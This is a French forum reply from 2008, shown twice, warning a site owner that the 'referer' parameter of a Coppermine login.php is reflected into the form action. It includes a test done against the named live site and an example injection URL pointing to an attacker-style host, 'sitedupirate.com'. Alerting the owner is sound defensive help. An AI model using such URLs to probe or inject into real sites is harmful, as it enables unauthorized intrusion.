par
Aureusms » 26 sept. 2008, 10:54
Bonjour,
Si ton site est :
http://voyenim.ovh.org/
Tu as une faille de sécurité dans ta méthode poste : action="login.php?referer=index.php">
J'ai tapé dans la barre d'adresse :
http://voyenim.ovh.org/Coppermine/login ... c:\\coucou
et <form action="login.php?referer=c%3A%5C%5Ccoucou" method="post" est apparu dans le code.
Si le pirate met :
http://voyenim.ovh.org/Coppermine/login ... \index.php
(j'ai mis les \ au lieu de / volontairement), il injecte son index.php.
Peut être est ce cela...
Bonjour,
Si ton site est : http://voyenim.ovh.org/
Tu as une faille de sécurité dans ta méthode poste : action="login.php?referer=index.php">
J'ai tapé dans la barre d'adresse : http://voyenim.ovh.org/Coppermine/login.php?referer=c:\\coucou
et <form action="login.php?referer=c%3A%5C%5Ccoucou" method="post" est apparu dans le code.
Si le pirate met :
http://voyenim.ovh.org/Coppermine/login.php?referer=http:\\sitedupirate.com\index.php
(j'ai mis les \ au lieu de / volontairement), il injecte son index.php.
Peut être est ce cela...